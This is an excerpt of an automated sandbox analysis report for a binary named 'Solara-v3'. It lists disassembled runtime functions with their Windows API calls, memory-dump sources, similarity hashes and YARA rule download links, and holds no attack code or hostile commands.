                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              • Opcode ID: 312c302f71ac46209dadb5ce7405c8772816304e897691440eb05a1128c37ba1
                                                                                                                                                                                                                                              • Instruction ID: 0d11e7d667e33bac7edaf8c40e38fe4b4398e91a7792c8ad6ba89c1431dbb19a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 312c302f71ac46209dadb5ce7405c8772816304e897691440eb05a1128c37ba1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8F0E931201923679F216A639C05F5A3B68AF83B78B144221FD27D64A0CE30DD00D6A1
                                                                                                                                                                                                                                              Function 00C97770 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::_Release_chore.LIBCPMT ref: 00C977C6
                                                                                                                                                                                                                                                • Part of subcall function 00C9AF64: CloseThreadpoolWork.KERNEL32(?,00000000,?,00C978DA,00000000), ref: 00C9AF72
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseConcurrency::details::_Release_choreThreadpoolWork
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 312417170-0
                                                                                                                                                                                                                                              • Opcode ID: 4f0f58b228c546fbfeec8bb9fce2f8a707effdcf9a84e80536083671151ecf03
                                                                                                                                                                                                                                              • Instruction ID: be990abcc7b0e56a13ed809f408405ba1e755ca43c296919cd3de29e213a8af4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f0f58b228c546fbfeec8bb9fce2f8a707effdcf9a84e80536083671151ecf03
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C0128B1C006599BDF04EF94D849B9EBBB4FB44720F004239E81967350E379AA45CAD2
                                                                                                                                                                                                                                              Function 00CABF11 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,00CADF35,?,?,00CADF35,00000220,?,00000000,?), ref: 00CABF43
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                              • Opcode ID: f505a417f2b58a5af7615197165b1947e2d3682eee6f43737731ac5abe2c79cc
                                                                                                                                                                                                                                              • Instruction ID: 4fa7214f4b67de36b69a3486c6003ad022938af4c21516c8f81beba1e17c10a8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f505a417f2b58a5af7615197165b1947e2d3682eee6f43737731ac5abe2c79cc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E4E0E5391055136FDA202AE69C00B5E76489F43BA8F1C0161FC3D96192DB20DD00D9A4
                                                                                                                                                                                                                                              Function 00C998F0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00C9990F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 118556049-0
                                                                                                                                                                                                                                              • Opcode ID: 727bd6c386a8345a202c3c6b5a05cf13a9a55f7284540b4e5771133ac51543f2
                                                                                                                                                                                                                                              • Instruction ID: 264a14d97c769cc906fee1def5e431dbfc73f75dc42096b9c2f4af7c97556994
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 727bd6c386a8345a202c3c6b5a05cf13a9a55f7284540b4e5771133ac51543f2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00D05E397050248B8B14BB28E91892E6355EFC8B21356049DE851D7345C7349C028680

                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                              Function 00CB7792 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1479COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                              • Opcode ID: ad0752ce14c4bcc680a2443615e17962c7bc590a7d31517f0ce45fd2a610af5d
                                                                                                                                                                                                                                              • Instruction ID: 5c6971aad8b73aca1801721f2cdb93350b3d4247a62872e56cc72e42112abf21
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad0752ce14c4bcc680a2443615e17962c7bc590a7d31517f0ce45fd2a610af5d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FD23C71E082298FDB65CE28DD40BEAB7B9EB84345F1441EAD81DE7240DB74AE85CF41
                                                                                                                                                                                                                                              Function 00CB1A07 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,00CB13BD,00000002,00000000,?,?,?,00CB13BD,?,00000000), ref: 00CB1AA0
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,00CB13BD,00000002,00000000,?,?,?,00CB13BD,?,00000000), ref: 00CB1AC9
                                                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,00CB13BD,?,00000000), ref: 00CB1ADE
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                              • Opcode ID: 5c127e82c2ef795ca11be661dc7a9e5c24c2e9aadeb328d991808b30119cee00
                                                                                                                                                                                                                                              • Instruction ID: 13248eed2cfaf7399c018441475c7669a2b727dc2540c22c95048bedbadf6c87
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c127e82c2ef795ca11be661dc7a9e5c24c2e9aadeb328d991808b30119cee00
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE218622B02100AADB348F65C920BDB72AAEF54B54FEE8464ED1AD7104E732FF41E350
                                                                                                                                                                                                                                              Function 00CB1287 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00CB138F
                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 00CB13CD
                                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 00CB13E0
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00CB1428
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00CB1443
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 415426439-0
                                                                                                                                                                                                                                              • Opcode ID: 75277235b415bac78661162eebbe39f15780d09928be2769d6d29be745592398
                                                                                                                                                                                                                                              • Instruction ID: 5e3d29eb867013b876b1c4f2a56b9b4da04086aaddf15d1bb4e3948a45cc171b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75277235b415bac78661162eebbe39f15780d09928be2769d6d29be745592398
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4514B71A00216ABDB10EFA5CC95FFE77B8EF05700F984469FD11E71A0EB709A409B61
                                                                                                                                                                                                                                              Function 00CA9CC0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                                                                                                                              • Instruction ID: 5b9a90fcf6a376943938d9e5eed5a6873832d296ab81365dd138a1aa54190464
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D021A71E0121A9FDF14CFA9C8816AEBBB1FF49318F248269E519E7341D731AE45CB90
                                                                                                                                                                                                                                              Function 00CB1FE9 Relevance: 6.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CB20D9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                                                                                                              • Opcode ID: 1be119e4f336affcf232595dcc93ef3851719bdfee1a693af396c08394868b79
                                                                                                                                                                                                                                              • Instruction ID: 910e29a15996c044ae38819d7c7d2a2455511321fc5fa2925f1b3c698b3a7c2c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1be119e4f336affcf232595dcc93ef3851719bdfee1a693af396c08394868b79
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A71D0B1905169AFDF21AF38DC89AFEBBB9AB05300F1442D9E559A3211DB318E85DF10
                                                                                                                                                                                                                                              Function 00C9F8E9 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00C9F8F5
                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00C9F9C1
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C9F9DA
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00C9F9E4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 254469556-0
                                                                                                                                                                                                                                              • Opcode ID: 374b088efc8bf964d2059e943881734d3812eef64262f716f18cf8da73b7b994
                                                                                                                                                                                                                                              • Instruction ID: 45519c451c2150b30e61416cf4319c1707b1c724b6a2b04d3597556eef4b2d79
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 374b088efc8bf964d2059e943881734d3812eef64262f716f18cf8da73b7b994
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2931F775D0122D9BDF21DFA4D949BCDBBB8AF08300F1041EAE40DAB290EB719B858F45
                                                                                                                                                                                                                                              Function 00CB1580 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB15D4
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB161E
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB16E4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 661929714-0
                                                                                                                                                                                                                                              • Opcode ID: 75d2aba41d345b0905087a322303e4d976b4115bb43344dcf8453f024f6c99f8
                                                                                                                                                                                                                                              • Instruction ID: 3f6c0472fee406935dbe550b819865c3c99b8882ab3fcb0065a5e2c302b71b15
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75d2aba41d345b0905087a322303e4d976b4115bb43344dcf8453f024f6c99f8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B61CF71A102079FDB289F68CDA2BFA73A8EF05700F6841B9ED15D7181EB34DA80DB50
                                                                                                                                                                                                                                              Function 00CA7E30 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00CA7F28
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00CA7F32
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00CA7F3F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                                              • Opcode ID: d0b5f0ea9a5951196065c952f87b8bf0bafcc32c3005b0b7eefe4dbb0bcdf412
                                                                                                                                                                                                                                              • Instruction ID: 156b2e1120f373531c0062c8552edf7e14af8c25f8826205cba3010e760e7666
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0b5f0ea9a5951196065c952f87b8bf0bafcc32c3005b0b7eefe4dbb0bcdf412
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4831D87590122D9BCB21DF64DD89B8DBBB8BF08310F5042EAE41DA7291E7709F858F45
